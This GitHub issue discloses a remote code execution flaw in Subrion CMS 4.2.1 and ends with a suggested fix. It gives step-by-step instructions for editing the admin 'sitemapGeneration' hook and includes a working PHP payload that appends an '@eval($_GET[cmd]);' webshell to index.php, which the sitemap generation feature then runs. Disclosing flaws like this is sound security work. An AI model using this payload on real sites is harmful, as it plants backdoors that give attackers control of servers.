-
Notifications
You must be signed in to change notification settings - Fork 116
Open
Description
There is a remote command execution vulnerability
Affected version
- subrion 4.2.1 lates
login address
http://127.0.0.1/panel
Find PHP info in the System module
Get the absolute path to the website in phpinfo information
_SERVER["DOCUMENT_ROOT"]
Attack
- Select the
Hooksfield in theSystemmodule
-
Edit
sitemapGenerationinHooksand saveGet absolute path from
PHPinfoabove_SERVER["DOCUMENT_ROOT"]=F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/At this point we can write webshell into the website’s homepage file index.php
payload
fputs(fopen('F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/index.php','a+'),'@eval($_GET[cmd]);');
- At this point, we can click the
Generate Sitemapfunction to trigger code execution
The site generation function is to first write a file, and then perform a syntax check on the written PHP code. If the check passes, the code execution will be triggered.
eval($hook['code']);- We are accessing the website homepage file index.php
Proposed changes
Filter dangerous functions and content in the content before writing the file
Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
No labels






